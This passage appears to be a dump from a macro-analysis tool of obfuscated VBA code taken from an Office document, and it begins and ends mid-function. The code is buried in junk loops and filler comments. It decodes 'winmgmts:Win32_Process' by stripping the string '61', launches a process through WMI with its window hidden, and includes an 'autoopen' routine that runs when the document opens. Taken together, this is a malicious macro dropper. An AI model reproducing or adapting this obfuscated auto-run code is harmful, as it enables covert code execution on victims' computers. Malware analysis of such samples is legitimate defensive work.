  Driveswjq = Azerbaijanian_Manatsjt + Len("112") 'zero defect Wyoming Cambridgeshire Industrial & Tools black Plastic Fiji pink Iraqi Dinar leading-edge Intelligent Legacy
  'alarm Small Plastic Computer Croatian Kuna Frozen compress AGP program
  New_Yorkrfh = Azerbaijanian_Manatsjt + Len("538") 'Sleek Steel Tuna Dam Monitored Senior Argentina Corporate FTP Handmade Cotton
  'Cambridgeshire Toys open-source Motorway Applications systems Steel Estates
  bandwidthzia = Azerbaijanian_Manatsjt + CStr(Licensedhrw) 'dynamic Light Savings Account methodical withdrawal Brand
  'Divide Rustic Plastic Fish Granite Brand invoice invoice Communications Fantastic hack budgetary management redundant Washington SAS sensor
  Wend
  'Regional impactful Licensed B2C Graphic Interface Senior
  Sleekoqn = Brunei_Dollarhhi + "p" + Health__Toysfwz(virtualjnt.Toystcj + virtualjnt.parsingmls) 'Digitized payment wireless olive Ethiopia Auto Loan Account copy bricks-and-clicks Lakes FTP connect Incredible Metal Keyboard
  '/structurebqj
  'hacking reciprocal Fantastic white Investor reboot Wooden Checking Account Orchestrator sensor transmit Pine circuit New Mexico
  Azerbaijanian_Manatsjt = "pricing structure Books & Baby backing up mindshare white Home Loan Account repurpose Quality needs-based Saudi Riyal Malawi"
  '/synthesizingpui
  While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
  'Florida streamline feed Intelligent Fresh Soap Corporate Investment Account RSS
  Handcrafted_Soft_Balltjz = Azerbaijanian_Manatsjt + CInt(866) 'distributed deposit Manors overriding models Checking Account
  'Auto Loan Account THX Networked optical responsive parallelism invoice
  Awesome_Steel_Soapdik = Azerbaijanian_Manatsjt + Len("604") 'synergies Savings Account Awesome neural transform Movies Incredible Generic Steel Car Industrial & Clothing uniform Rubber
  'Intelligent Granite Gloves Infrastructure Cliff generating orchid Intelligent online calculate Administrator Denar Wooden national withdrawal solutions
  ebusinessivu = Azerbaijanian_Manatsjt + CInt(301) 'B2B Representative quantify synthesizing Handmade Checking Account Borders Isle Data generate Branding Assurance
  'Global Fantastic Steel Ball Lead payment transitional Savings Account Bedfordshire invoice Illinois synthesize
  Intelligent_Granite_Shoeslnw = Azerbaijanian_Manatsjt + Len("846") 'Awesome Metal Salad bus invoice whiteboard B2B Gorgeous Granite Table transmit generating
  'ubiquitous internet solution transmitter knowledge user parsing Metal Implementation Berkshire deposit Alaska unleash salmon Inlet
  strategizeitt = Azerbaijanian_Manatsjt + Len("450") 'Gorgeous Danish Krone lime initiatives embrace challenge Unbranded Granite Computer Fantastic New York next-generation back up calculate
  'regional Persistent feed Markets protocol THX navigate product copying tan
  Centralmlf = Azerbaijanian_Manatsjt + CStr(copybaz) 'Technician Bedfordshire Manat Books, Computers & Health withdrawal Mississippi Personal Loan Account index Ferry panel Flat
  'Ports Incredible Rubber Chair applications national Glens Chief Quality Health & Kids Distributed azure invoice
  Wend
  'Tasty Rubber Gloves Object-based Ergonomic Concrete Keyboard generating communities Licensed Refined Fresh Pants Health, Outdoors & Electronics
  Creekvak = auxiliaryfik 'cross-platform TCP Monitored multimedia parse Fords Architect Gorgeous quantifying neural methodologies Open-source web-readiness
  Set Rustic_Concrete_Baconflz = CreateObject(Health__Toysfwz(Health__Toysfwz(CStr(199017 + 61 - 199017) + "6161616161616161616161winmgmt61616161s:Win32_616161616161Proce616161616161616161ss")))
  Creekvak = Creekvak + Rustic_Concrete_Baconflz.Create((Sleekoqn), Runlzr, upwardtrendingjtc, quantifyingkkj)
  '/mobilezvj
  'value-added impactful tan Brunei Dollar SAS Ergonomic Frozen Chicken Walk withdrawal Home Loan Account violet primary mint green deposit
  Azerbaijanian_Manatsjt = "cross-platform Hills Field Concrete utilisation parse Taiwan Freeway Licensed Bahamian Dollar Managed throughput"
  '/Groupiuh
  While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
  'Internal programming Expanded Avenue quantifying installation generate Buckinghamshire
  Kids__Toyswjj = Azerbaijanian_Manatsjt + CInt(110) 'Maine payment Norfolk Island Sports Afghanistan convergence Tennessee streamline Jersey interface silver Fantastic Soft Keyboard COM Unbranded Concrete Ball
  'Customer PNG Investment Account Streamlined Austria port Sleek Plastic Bacon District AI index seize Money Market Account generate
  Sleek_Plastic_Shirtozp = Azerbaijanian_Manatsjt + Len("264") 'Soft calculate hack Ways Orchestrator partnerships cyan GB regional white bypassing Home Loan Account Beauty, Beauty & Electronics
  'Avon migration feed compress Sleek Home, Sports & Home Electronics, Outdoors & Beauty yellow bypassing
  compressinghzp = Azerbaijanian_Manatsjt + CInt(43) 'Norway Ergonomic Wooden Soap Investor Licensed Berkshire Practical Bedfordshire Fresh orange
  'grey Indiana distributed multi-state Personal Loan Account Coordinator contingency Small Credit Card Account Sleek Lake online
  Marketsbij = Azerbaijanian_Manatsjt + Len("657") 'cutting-edge Product Russian Ruble e-services Global Corporate Soft multi-byte global Executive primary
  'Refined Cotton Table Mississippi synthesize application Arizona Applications invoice Usability
  whitezfz = Azerbaijanian_Manatsjt + Len("23") 'Radial Buckinghamshire synergy Configuration connecting Incredible Cotton Chicken Algerian Dinar Argentine Peso
  'Response Frozen Idaho back-end Checking Account copying Regional value-added Burundi Money Market Account
  generatejwh = Azerbaijanian_Manatsjt + CStr(Graniteuwk) 'Minnesota Buckinghamshire Savings Account Iceland user-centric repurpose calculate Technician quantifying
  'Concrete Officer success Kids & Shoes Administrator Awesome Rubber Pants
  Wend
  'Berkshire redundant encoding Riel 1080p Belize Dollar Indiana bandwidth Refined Steel Shirt niches Generic Metal Computer Auto Loan Account
  End Function"
  File "functionalitiestfi.bas" (Streampath: "Macros/VBA/functionalitiestfi") has code: "Function upwardtrendingjtc()
  On Error Resume Next
  '/fuchsiapnt
  'withdrawal Trail Borders Finland Indiana Sports & Books calculating system Human Mali Gibraltar
  Azerbaijanian_Manatsjt = "Plastic Kids & Music US Dollar Avon Incredible Granite Chair multi-byte"
  '/Directorsrv
  While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
  'Republic of Korea turn-key Functionality bricks-and-clicks ADP Checking Account
  granularkvd = Azerbaijanian_Manatsjt + CInt(683) 'Grocery & Music back-end override Connecticut Comoro Franc Port Licensed Frozen Hat next generation Money Market Account streamline cyan
  'applications Engineer Cape Verde Buckinghamshire scalable Personal Loan Account Greece modular Jewelery & Automotive Gorgeous Concrete Towels copy
  Fullyconfigurableuzd = Azerbaijanian_Manatsjt + Len("658") 'Unbranded Cotton Chicken Outdoors & Automotive circuit black Home Loan Account Chief
  'task-force red Grocery, Industrial & Home Specialist secured line Generic supply-chains Tasty Rubber Ball deposit 5th generation Pine strategize
  Comoroslmz = Azerbaijanian_Manatsjt + CInt(777) 'input Visionary Frozen frame copy tan portals Kids Generic
  'productivity connect Louisiana Home Loan Account programming Group proactive
  Brandfdh = Azerbaijanian_Manatsjt + Len("296") 'Nebraska Automated open architecture Plastic Handmade Fresh Cheese Refined application violet Venezuela Generic Steel Gloves Kina Berkshire Lights solid state
  'ADP IB back up groupware Vanuatu driver
  onetooneihp = Azerbaijanian_Manatsjt + Len("922") 'Shoals regional impactful firewall Regional Agent West Virginia cross-platform ivory Investor Principal Dynamic
  'Architect capability Ergonomic Cotton Computer Principal Palladium repurpose Generic Metal Ball Grocery & Automotive secured line payment Robust Ergonomic Wooden Tuna generating
  Algerian_Dinarqmh = Azerbaijanian_Manatsjt + CStr(invoicedwf) 'optical Borders extend Accountability Planner fresh-thinking info-mediaries Euro Dynamic Division Assimilated Practical Granite Hat SMTP Licensed Fresh Car
  'Soft Dynamic Ergonomic Fresh Bike Mauritius Assurance Indiana policy Licensed turquoise Iraqi Dinar unleash Kwanza
  Wend
  'Fresh Product overriding microchip intranet Missouri Soft
  '/bypassingspp
  'monitor Dynamic Practical Dynamic Decentralized Fords Islands unleash orchestrate Botswana Associate end-to-end
  Azerbaijanian_Manatsjt = "application Industrial & Shoes Awesome Metal Shirt capacitor Rue deposit Fresh Run Norwegian Krone Inlet connecting Practical Frozen Chips calculating"
  '/fullrangernv
  While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
  'bandwidth National Mountains Networked Strategist Hawaii
  Handcraftedajv = Azerbaijanian_Manatsjt + CInt(663) 'Investment Account model Bedfordshire Executive Passage Connecticut Handcrafted Granite Table Shoals River Arizona Senegal cross-platform
  'multi-byte deposit synthesize Fantastic Metal Shirt Open-source Assurance Computers, Sports & Music digital mobile solid state Integrated quantifying
  empowerljo = Azerbaijanian_Manatsjt + Len("626") 'Unions South Georgia and the South Sandwich Islands Granite technologies next-generation SDD
  'reboot Intelligent Steel Bacon International neural Solomon Islands Dollar Industrial Terrace
  Centralwzu = Azerbaijanian_Manatsjt + CInt(496) 'tan contingency panel Buckinghamshire Turkish Lira Polarised synergy Clothing metrics generating navigating Bulgaria synthesizing
  'Sharable mobile Sierra Leone Crescent front-end backing up wireless Berkshire
  Intelligentbcd = Azerbaijanian_Manatsjt + Len("400") 'Movies, Beauty & Outdoors Sri Lanka Rupee portal Soft encompassing Licensed Refined end-to-end
  'Human calculating 1080p wireless invoice streamline Rustic Granite Table backing up plug-and-play Guadeloupe Denmark integrate impactful
  Credit_Card_Accountowf = Azerbaijanian_Manatsjt + Len("97") 'reciprocal microchip Berkshire Mississippi Tasty Plastic Cheese Small navigating streamline Cove quantifying
  'Associate Massachusetts hard drive engage enterprise methodologies metrics Concrete Row Burg
  Woodenpdp = Azerbaijanian_Manatsjt + CStr(Home_Loan_Accountnfr) 'systematic generate connecting Belarus copying Falls
  'Communications wireless Checking Account UAE Dirham Awesome Home Loan Account
  Wend
  'evolve Villages circuit Trace South Dakota embrace zero tolerance Georgia Incredible Soft Chair concept Licensed Steel Table Mountain Automotive & Baby Ergonomic
  Set upwardtrendingjtc = CreateObject(Unionclc + Health__Toysfwz(virtualjnt.Estateaah + valueaddedhos))
  '/Smalllal
  'ivory Intranet wireless HDD deposit Public-key e-commerce Lithuania Consultant quantifying mint green Licensed Fresh Pizza Viaduct
  Azerbaijanian_Manatsjt = "parsing SMS Lead neural high-level Bangladesh Metal Virginia Isle Books
  Beauty & Kids"
  '/transmitteroaz
  While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
  'Refined Rubber Chair Games, Baby & Automotive Unbranded feed incremental cross-platform wireless hybrid real-time Lesotho
  hackingnaw = Azerbaijanian_Manatsjt + CInt(271) 'Savings Account tan quantifying National visualize FTP Consultant Wooden
  'quantify Industrial quantifying Awesome Metal Keyboard end-to-end Frozen Ergonomic Maryland Walk Ergonomic Cotton Chair e-services Ports Berkshire Games & Clothing
  convergencecom = Azerbaijanian_Manatsjt + Len("153") 'invoice interface connect Frozen tan Arkansas real-time open-source Knoll British Indian Ocean Territory (Chagos Archipelago) Investment Account Divide
  'Montana Fantastic Wooden Bike Soft Cotton Fully-configurable back up Checking Account overriding
  Dynamicbmm = Azerbaijanian_Manatsjt + CInt(474) 'Chief Berkshire Licensed AGP Communications Music mint green
  'Tasty Concrete Shirt transmitter Identity parse EXE Berkshire
  paymentvzs = Azerbaijanian_Manatsjt + Len("67") 'Spurs Glen incubate Credit Card Account violet Operative FTP
  'Saint Barthelemy Incredible Rustic Rubber Chair visualize Practical Infrastructure Jordanian Dinar
  Genericivj = Azerbaijanian_Manatsjt + Len("599") 'Focused extend South Africa Shoal pixel Minnesota transmit Intelligent Frozen Tuna backing up
  'COM Island navigating mindshare lavender Checking Account Assistant User-centric Ergonomic Soft Chicken Incredible Rubber Table Drive intermediate Tunisia
  Handcrafted_Concrete_Chairzdj = Azerbaijanian_Manatsjt + CStr(implementkil) 'Bedfordshire Qatari Rial Norfolk Island backing up Security applications Pennsylvania Architect Walk
  'Fields Sports, Games & Outdoors Wyoming Baby, Games & Outdoors Extended Bedfordshire harness knowledge base Rustic Metal encoding transmit Avon Dalasi
  Wend
  'Paradigm HDD Martinique parse invoice Focused Designer
  '/streamlineili
  'Money Market Account neutral Rustic deposit Fresh bandwidth HDD hack Palestinian Territory Configuration Chief e-business
  Azerbaijanian_Manatsjt = "neural Kentucky AGP Internal application withdrawal Rhode Island Kids & Automotive silver navigating Costa Rican Colon tan intranet leading-edge"
  '/Spurssrz
  While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
  'Credit Card Account PCI Product Louisiana Refined Frozen Salad transform Product Shores withdrawal Vision-oriented system Fantastic Wooden Shirt Cotton
  JBODpzv = Azerbaijanian_Manatsjt + CInt(41) 'Identity Borders Tasty Rubber Mouse USB Jewelery clicks-and-mortar Lead Forks Chief Utah Agent Personal Loan Account Bedfordshire Cameroon
  'teal reboot Lane matrix Dynamic e-business Identity Integration
  hackkkm = Azerbaijanian_Manatsjt + Len("716") 'technologies Cotton Connecticut Multi-channelled convergence Romania Azerbaijan Fresh distributed bypassing Tools & Health mission-critical 24/7
  'Norfolk Island Communications Markets Aruba Rustic Rubber Car Specialist Avon Lead Trace Lebanon Louisiana Timor-Leste Versatile Movies & Automotive
  Savings_Accountkid = Azerbaijanian_Manatsjt + CInt(397) 'parse Mobility Vermont back-end California program Consultant Handcrafted Response Freeway Sleek Metal Chair
  'Rubber Small Awesome Steel Hat Generic Plastic Chair scale Alabama orange magnetic card enterprise haptic Movies, Jewelery & Jewelery database Investor
  USBwdb = Azerbaijanian_Manatsjt + Len("94") 'Assistant matrix Associate Decentralized interactive Incredible Concrete Cheese Arizona GB
  'directional open-source 24/7 Home Loan Account implementation Synchronised Consultant Creek Hawaii
  programazk = Azerbaijanian_Manatsjt + Len("448") 'Berkshire 24/365 Chad Shoes Sharable Analyst reboot Tasty Metal Bacon
  'connect Ghana Shores reboot Macedonia strategy Intelligent
  ivoryzwc = Azerbaijanian_Manatsjt + CStr(impactfulrft) 'engage Slovakia (Slovak Republic) PNG Savings Account Sleek Cotton Fish holistic Cambridgeshire 1080p
  'virtual 1080p Solutions THX compress Saint Helena Hills application Wooden action-items Fresh sky blue web-readiness Legacy
  Wend
  'users interfaces firewall Licensed e-commerce Home Loan Account Future
  upwardtrendingjtc.ShowWindow = wdTextureNone
  '/Small_Metal_Hatahl
  'Clothing & Home Industrial Texas internet solution Prairie Direct disintermediate Research Intelligent Frozen Bacon Program Functionality Coordinator Borders
  Azerbaijanian_Manatsjt = "ADP SCSI synthesizing Steel 1080p JSON Steel"
  '/zero_defectilv
  While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
  'systemic Handcrafted Wooden Gloves Yen back up Awesome Soft Ball Licensed Garden calculate Movies, Home & Health azure Graphic Interface proactive circuit bypass
  Mandatoryjnk = Azerbaijanian_Manatsjt + CInt(607) 'Plastic clear-thinking indexing invoice compressing Automotive, Books & Shoes Kwacha dynamic Business-focused
  'Fantastic deposit bypass repurpose Assistant XML Clothing, Automotive & Electronics Directives recontextualize
  Cottonnda = Azerbaijanian_Manatsjt + Len("954") 'Advanced Island Baby Investment Account syndicate American Samoa Toys, Books & Movies empower Refined Creek
  'synergy analyzer navigate architect SDD PCI Seamless transmit
  Crossgroupidc = Azerbaijanian_Manatsjt + CInt(311) 'protocol Berkshire recontextualize Developer card cyan bypass Regional Kansas Ergonomic Frozen Soap RAM Baby Marketing Islands
  'Focused New Hampshire Books & Shoes plug-and-play Money Market Account Drives Berkshire digital Buckinghamshire Legacy
  Rupiahcat = Azerbaijanian_Manatsjt + Len("426") 'invoice Concrete magnetic Incredible Sleek Wooden Chips Intranet sky blue TCP Mexico panel empower web services Syrian Arab Republic synthesizing
  'Turkish Lira Berkshire Auto Loan Account Square Planner invoice SDD Sleek Concrete Salad Extended grid-enabled empowering
  Incredible_Concrete_Chipslbj = Azerbaijanian_Manatsjt + Len("964") 'Grocery & Jewelery redundant Dynamic Bedfordshire copying Berkshire Architect Ergonomic Steel Sausages Legacy directional Frozen
  'pixel payment Bedfordshire Burundi Avon extensible Orchestrator withdrawal Borders solution-oriented Consultant Legacy mint green
  hackingtto = Azerbaijanian_Manatsjt + CStr(worldclassbhi) 'e-services Glen Decentralized CFA Franc BEAC withdrawal Washington quantify cross-platform Facilitator Cotton Cotton grid-enabled
  'multi-state Automotive Quality PCI service-desk lime fuchsia Tasty Wooden Sausages e-enable Texas deposit Auto Loan Account Generic Soft Car Associate
  Wend
  'Supervisor Coves matrix Kina Malaysian Ringgit Buckinghamshire Credit Card Account auxiliary Optimization Outdoors & Toys New Taiwan Dollar morph circuit
  '/bypassingtuh
  'Money Market Account Ford RAM panel 5th generation Florida Re-contextualized silver
  Azerbaijanian_Manatsjt = "e-enable methodologies Supervisor withdrawal Sleek Practical Plastic Cheese bypass Home Loan Account Industrial & Computers Central Dynamic circuit"
  '/Virtualfot
  While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
  'Creative client-server bricks-and-clicks Manors SQL plum Harbors Fantastic Frozen Ball connecting hierarchy Paraguay application Liaison
  Opensourceatz = Azerbaijanian_Manatsjt + CInt(952) 'Agent Incredible process improvement end-to-end silver Awesome global Fundamental Graphical User Interface quantifying
  'Sleek Granite Tuna open-source Investment Account leverage Parkways port Venezuela Triple-buffered
  navigatingadr = Azerbaijanian_Manatsjt + Len("532") 'protocol Agent silver black Small Concrete Mouse envisioneer National
  'Practical content Avon Refined Frozen Soap Lithuania backing up compress Cotton Steel deposit back-end architectures
  Booksmod = Azerbaijanian_Manatsjt + CInt(585) 'Generic asynchronous purple withdrawal green Rhode Island ROI deposit Infrastructure Buckinghamshire Coves well-modulated Tasty cyan
  'invoice Refined Industrial, Toys & Toys navigating exploit networks Saudi Riyal clicks-and-mortar PCI Congo
  Woodenjph = Azerbaijanian_Manatsjt + Len("690") 'back up bandwidth Tactics access User-friendly input throughput Surinam Dollar Glen Rubber Rustic Fresh Toys optimal
  'Tactics British Indian Ocean Territory (Chagos Archipelago) card compressing backing up Extended hacking markets
  Irelandkzj = Azerbaijanian_Manatsjt + Len("209") 'payment parse Overpass Forks Security Personal Loan Account Direct invoice Home Money Market Account Home Loan Account
  'Auto Loan Account Plaza tangible data-warehouse Developer navigate transmit budgetary management scale
  Valleyibm = Azerbaijanian_Manatsjt + CStr(Heard_Island_and_McDonald_Islandswtz) 'Distributed Credit Card Account AI array Forges Texas
  'transmit Music, Music & Games Paradigm benchmark quantifying Cross-platform circuit Producer Frozen TCP Villages Metrics Unbranded Frozen Table Handcrafted Wooden Sausages
  Wend
  'Director bluetooth Tasty Cotton Table COM auxiliary withdrawal Architect Borders experiences Legacy Alabama purple Small
  End Function
  Function Health__Toysfwz(Harborhtw)
  On Error Resume Next
  '/Incredible_Concrete_Chairkfj
  'experiences Connecticut Gambia Fantastic Wooden Gloves Connecticut Berkshire Refined Wooden Salad integrated
  Azerbaijanian_Manatsjt = "Central Designer coherent Jewelery online Grocery
  Movies & Automotive"
  '/Baby__Beautynts
  While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
  'Beauty, Garden & Music Hollow Tasty Plastic Shoes Place Uzbekistan Sum project array Metrics Garden, Home & Automotive Money Market Account
  clientdrivenpbi = Azerbaijanian_Manatsjt + CInt(802) 'connecting Business-focused communities indexing implement withdrawal Fresh Ways hard drive Common Implementation
  'Phased attitude Solutions overriding Intelligent Frozen Chair Graphical User Interface Fantastic Steel Pants copying Forward invoice
  Berkshirebnm = Azerbaijanian_Manatsjt + Len("47") 'back-end applications Road back-end reintermediate middleware compress software deposit Applications partnerships
  'Chile National Denmark Organic grid-enabled Operations productivity Wall Money Market Account ADP payment Cotton
  Motorwayubw = Azerbaijanian_Manatsjt + CInt(579) 'Auto Loan Account Small application hacking innovate deposit Functionality
  'blue scalable exploit deposit Analyst Programmable Myanmar Walks Trace Sleek Metal Fish Gorgeous Fresh Hat Springs
  missioncriticalcuw = Azerbaijanian_Manatsjt + Len("937") 'Generic Wooden Pants Fantastic Wooden Cheese Fresh dedicated index multi-byte bypass Enterprise-wide Key reciprocal violet Mississippi Program
  'Facilitator tertiary Fantastic Cotton Salad Savings Account Stravenue generating Station card Customer
  Drivesail = Azerbaijanian_Manatsjt + Len("271") 'Buckinghamshire executive indigo forecast plum quantifying bypassing AI
  'Facilitator magnetic cyan Corner input Ohio grey program
  Dynamicmmz = Azerbaijanian_Manatsjt + CStr(enterprisewsi) 'Maine Hawaii Personal Loan Account port Small Metal Chair productivity Producer microchip transmitting
  'Applications engage e-business Knolls Pre-emptive Licensed Fresh Soap Granite North Dakota bypass Ergonomic Cotton Mouse violet mobile
  Wend
  'program Strategist Utah archive Representative ADP extranet
  '/salmonfzv
  'Practical Fresh Salad Metal payment Small Cotton Fish Tala Intelligent metrics maximize Investment Account
  Azerbaijanian_Manatsjt = "deposit 24/7 access Borders cross-platform program Home
  Home & Garden Incredible multi-tasking Customer"
  '/Humanzon
  While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
  'digital methodologies generate Associate Saudi Riyal Tunisian Dinar
  systemrzh = Azerbaijanian_Manatsjt + CInt(782) 'Kina Practical deposit Indiana Tasty transmitting Unbranded Wooden Towels encoding repurpose pixel
  'Stream TCP Taka open-source Rustic innovative Credit Card Account Profound deposit
  Handcrafted_Rubber_Soapzru = Azerbaijanian_Manatsjt + Len("958") 'Metal Cambridgeshire efficient transmitting technologies index holistic Ergonomic Wooden Ball North Carolina
  'interactive Squares SMTP Arizona implementation world-class deposit Common Generic Bedfordshire gold withdrawal Norway
  Synchronisedkbz = Azerbaijanian_Manatsjt + CInt(141) 'copying Sleek Cambridgeshire Small quantifying magenta Branding Toys, Automotive & Movies Handmade Fantastic Frozen Chair South Carolina Monitored
  'Slovenia Gorgeous Synchronised lavender parse architectures Money Market Account Interactions bandwidth compressing
  Securedlfo = Azerbaijanian_Manatsjt + Len("747") 'ROI card Union Rand Granite Corporate COM transparent Cotton transmitter transmitting mobile payment Fresh
  'paradigms Personal Loan Account Representative Movies program circuit fuchsia application neutral Tasty Wooden Bacon Representative Kids & Health calculate
  Checking_Accountaoj = Azerbaijanian_Manatsjt + Len("253") 'Forward connecting Refined Steel Mouse Global Handmade Plastic Soap e-commerce Personal Loan Account Timor-Leste applications Refined Plastic Ball
  'invoice Optimization Square budgetary management Operations monitoring index
  Regionaldjm = Azerbaijanian_Manatsjt + CStr(Garden__Electronicsoim) 'Ergonomic Soft Hat Group Berkshire Hungary bluetooth Agent Balanced driver responsive Balanced Intuitive
  'Gorgeous Estates invoice utilisation blue copying Sleek Fresh Pizza open-source Orchard Hryvnia navigating
  Wend
  'Human virtual redefine Tasty Fresh Shirt Prairie Engineer alarm Refined metrics Unbranded Frozen Bike
  copyhsl = Harborhtw
  '/ebusinesscow
  'Cotton Kids, Clothing & Clothing heuristic Shoes Small Fords Internal Buckinghamshire Intelligent Fresh Hat Sierra Leone Summit experiences redefine COM
  Azerbaijanian_Manatsjt = "Tasty Frozen Mouse orchestrate deposit lavender Strategist Arkansas Devolved Implementation Heights Unbranded Granite Shoes Station Synergistic"
  '/wa247nco
  While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
  'indexing withdrawal EXE quantifying next generation Bedfordshire Books, Automotive & Beauty El Salvador
  Unionvoh = Azerbaijanian_Manatsjt + CInt(426) 'maximize Vision-oriented Sleek Rubber Shirt global Buckinghamshire Washington cross-platform Guyana Dollar Bahamian Dollar Kids Future panel encryption
  'HDD Interactions Texas methodical Berkshire virtual Rubber indigo
  Glenswqr = Azerbaijanian_Manatsjt + Len("563") 'Interactions aggregate Georgia Auto Loan Account communities Small Plastic Cheese Islands Compatible
  'networks Sudan Beauty program programming optical withdrawal Plastic synthesizing
  Parkjim = Azerbaijanian_Manatsjt + CInt(681) 'Soft Wyoming Granite open architecture Exclusive driver paradigms Intelligent Cotton Ball Unbranded monitoring primary
  'reboot Islands Nepal Multi-channelled Home Loan Account Plastic transmitting action-items Jordanian Dinar initiative Buckinghamshire Buckinghamshire indexing Electronics, Automotive & Health
  Tastyapv = Azerbaijanian_Manatsjt + Len("784") 'Way Fields cyan Directives Checking Account groupware programming card Texas override Regional
  'model Administrator connecting Garden & Computers Bermudian Dollar (customarily known as Bermuda Dollar) Forint e-markets violet override withdrawal maroon invoice Wooden
  quantifyingtuw = Azerbaijanian_Manatsjt + Len("847") 'Avenue deliverables Cliffs New Taiwan Dollar Right-sized Fantastic Wooden Chair deposit monitor Implemented Usability
  'withdrawal Rapids Uganda Shilling Passage auxiliary e-business Fantastic Fresh Sausages Borders payment strategize harness Handcrafted Soft Keyboard
  paymentrjm = Azerbaijanian_Manatsjt + CStr(optimizejbb) 'invoice Row tan leading-edge ubiquitous exploit world-class Supervisor Engineer
  'compressing Licensed Concrete Tuna array Fords Direct Checking Account Automotive ADP Solomon Islands Dollar deposit pixel Falls
  Wend
  'open-source Kuwaiti Dinar viral neural Cambridgeshire SMTP Solutions
  indigoqss = "61"
  '/Home_Loan_Accountpnn
  'programming Intelligent Extended next-generation Handmade Wooden Soap leading edge orange Extension
  Azerbaijanian_Manatsjt = "withdrawal Direct SAS Oregon overriding French Southern Territories Intelligent Granite Chicken"
  '/bandwidthmonitoredvfb
  While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
  'synthesizing Customer envisioneer parsing Tasty Plastic Cheese Gorgeous Savings Account
  scalepuw = Azerbaijanian_Manatsjt + CInt(911) 'North Dakota Movies & Clothing Kids Berkshire Plastic synthesize Direct Road Isle Internal distributed Representative Central
  'bluetooth Passage process improvement leverage Orchestrator Metal
  programmingzjo = Azerbaijanian_Manatsjt + Len("537") 'Viaduct SCSI Guarani solutions Port Borders gold invoice European Unit of Account 17(E.U.A.-17) Soft
  'Refined optical connecting Strategist paradigm Frozen Road parse Applications FTP
  Directzzp = Azerbaijanian_Manatsjt + CInt(954) 'North Carolina Games Fantastic Avon Missouri Sleek extensible hack Small Wooden Tuna methodologies firewall Ukraine Avon
  'European Unit of Account 17(E.U.A.-17) Automated digital Stream Credit Card Account override Thailand
  primaryzlc = Azerbaijanian_Manatsjt + Len("272") 'override Computers & Movies Outdoors, Grocery & Clothing deposit withdrawal Credit Card Account Fresh Lights Money Market Account Handcrafted Wooden Keyboard Global enhance
  'Liaison Cuba Lithuania Handcrafted Cotton Chair backing up copy Ergonomic Soft Hat
  copyumz = Azerbaijanian_Manatsjt + Len("594") 'Strategist Money Market Account Practical Frozen Consultant Unbranded Incredible Cook Islands firewall Investment Account
  'back-end Investment Account Berkshire Place Portugal Arkansas disintermediate Hungary River Ergonomic Awesome Eritrea Meadow
  Auto_Loan_Accountiok = Azerbaijanian_Manatsjt + CStr(connectovh) 'Operations Mayotte Ports Hill circuit reinvent wireless connecting
  'Garden Ameliorated Oklahoma back-end Brook relationships
  Wend
  'architect Islands parsing Centers Tasty Fresh
  Health__Toysfwz = Replace(copyhsl, indigoqss, "") 'Checking Account payment Practical Fresh Shirt Optional Concrete Awesome Frozen Bike Jordanian Dinar
  '/Knollsdnt
  'Planner Universal Analyst zero tolerance transparent Secured supply-chains Incredible Cotton Shoes Intelligent Steel Mouse Steel protocol Incredible global
  Azerbaijanian_Manatsjt = "Intelligent Plastic Chicken Designer payment Rustic vertical Ergonomic Concrete Table Metal Handmade turquoise"
  '/Small_Frozen_Towelsrka
  While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
  'sky blue impactful Extensions Dam functionalities deposit parse Roads Netherlands payment
  feedzjj = Azerbaijanian_Manatsjt + CInt(932) 'e-business backing up Steel programming Kip methodical
  'Generic Refined Cotton Mouse Sleek Frozen system redefine complexity Administrator Granite Sleek Steel Ball Dalasi withdrawal synergistic
  transitionalvak = Azerbaijanian_Manatsjt + Len("923") 'Cambridgeshire deposit Automotive Hills real-time Awesome Granite Keyboard systems Soft invoice eco-centric haptic Orchard hack Sleek
  'deposit content 1080p utilisation Concrete paradigms
  systemjbs = Azerbaijanian_Manatsjt + CInt(932) 'solid state Chief Delaware model North Dakota Uganda Shilling
  'orchid connecting Plaza turquoise Sharable HTTP Small Plastic Soap strategic Investment Account
  Generic_Metal_Cheesecuq = Azerbaijanian_Manatsjt + Len("913") 'Bedfordshire Trinidad and Tobago Credit Card Account Orchestrator online Supervisor interfaces client-server Legacy Missouri
  'Unbranded Soft Chips Jewelery, Beauty & Jewelery Cedi streamline focus group Executive Interactions bluetooth Prairie optical THX Springs
  greydfh = Azerbaijanian_Manatsjt + Len("36") 'Handcrafted Rubber Soap Plastic Keys Utah optical Buckinghamshire Wooden Village Concrete asymmetric Facilitator
  'bus Bedfordshire Games Distributed alarm Developer reboot Accounts Orchard
  Kentuckywsh = Azerbaijanian_Manatsjt + CStr(exploithil) 'Ergonomic Marketing generate Savings Account Global interactive
  'Handmade circuit system-worthy dynamic models Port
  Wend
  'microchip Granite backing up Practical Metal Hat Legacy synthesize Sudanese Pound
  End Function
  Sub autoopen()
  On Error Resume Next
  '/Garden_Movies__Movieszin
  'e-business Realigned compressing Illinois Facilitator Taka Fall Plastic French Southern Territories interfaces platforms
  Azerbaijanian_Manatsjt = "functionalities visionary haptic parsing Granite Generic Frozen Hat Sweden online"
  '/Intelligent_Cotton_Computerjzz
  While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
  'invoice Virgin Islands, British artificial intelligence Tools & Toys Multi-layered budgetary management
  scalepbh = Azerbaijanian_Manatsjt + CInt(141) 'database Bedfordshire productize Avenue synergies hack Forward Pre-emptive quantifying Ukraine
  'Operations Investment Account Flat compressing Gorgeous Metal Tuna 24/7 paradigm Health backing up Investment Account Bedfordshire Intelligent Concrete Ball
  dynamicipj = Azerbaijanian_Manatsjt + Len("137") 'synthesize Wisconsin aggregate bluetooth Handcrafted Wooden Computer Refined Wooden Gloves Fresh Central Montenegro Savings Account
  'invoice analyzer Intelligent Cotton Chair Checking Account incubate Handcrafted Fresh Bacon Benin Analyst parallelism
  Dominicaqcq = Azerbaijanian_Manatsjt + CInt(320) 'synthesizing mission-critical Gorgeous object-oriented override Fantastic hierarchy Legacy
